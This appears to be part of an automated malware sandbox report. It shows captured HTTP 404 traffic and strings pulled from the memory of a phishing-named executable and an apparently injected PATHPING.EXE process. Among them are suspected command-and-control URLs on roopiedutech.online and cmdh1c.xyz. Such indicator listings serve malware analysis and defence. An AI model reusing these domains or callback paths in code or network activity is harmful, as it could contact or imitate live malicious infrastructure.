                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:24 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:20:02 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:20:04 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:20:07 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 01 Nov 2024 08:20:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close x-ray: p529:0.000
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 01 Nov 2024 08:20:27 GMT server: LiteSpeed vary: User-Agent
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 01 Nov 2024 08:20:30 GMT server: LiteSpeed vary: User-Agent
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 01 Nov 2024 08:20:35 GMT server: LiteSpeed vary: User-Agent
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Fri, 01 Nov 2024 08:20:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 162 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: PATHPING.EXE, 00000007.00000002.4136306334.0000000004348000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.0000000003548000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: RprkEKYwQARXc.exe, 00000008.00000002.4137334870.0000000005304000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz
                Source: RprkEKYwQARXc.exe, 00000008.00000002.4137334870.0000000005304000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.cmdh1c.xyz/6byd/
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, draft contract for order #782334.exe, 00000000.00000002.1761759486.00000000061E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: draft contract for order #782334.exe, 00000000.00000002.1761828217.00000000072B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: PATHPING.EXE, 00000007.00000002.4136306334.0000000004FD8000.00000004.10000000.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135690068.00000000041D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.adm.tools/parking-page/style.css
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PATHPING.EXE, 00000007.00000002.4138291556.0000000007D88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
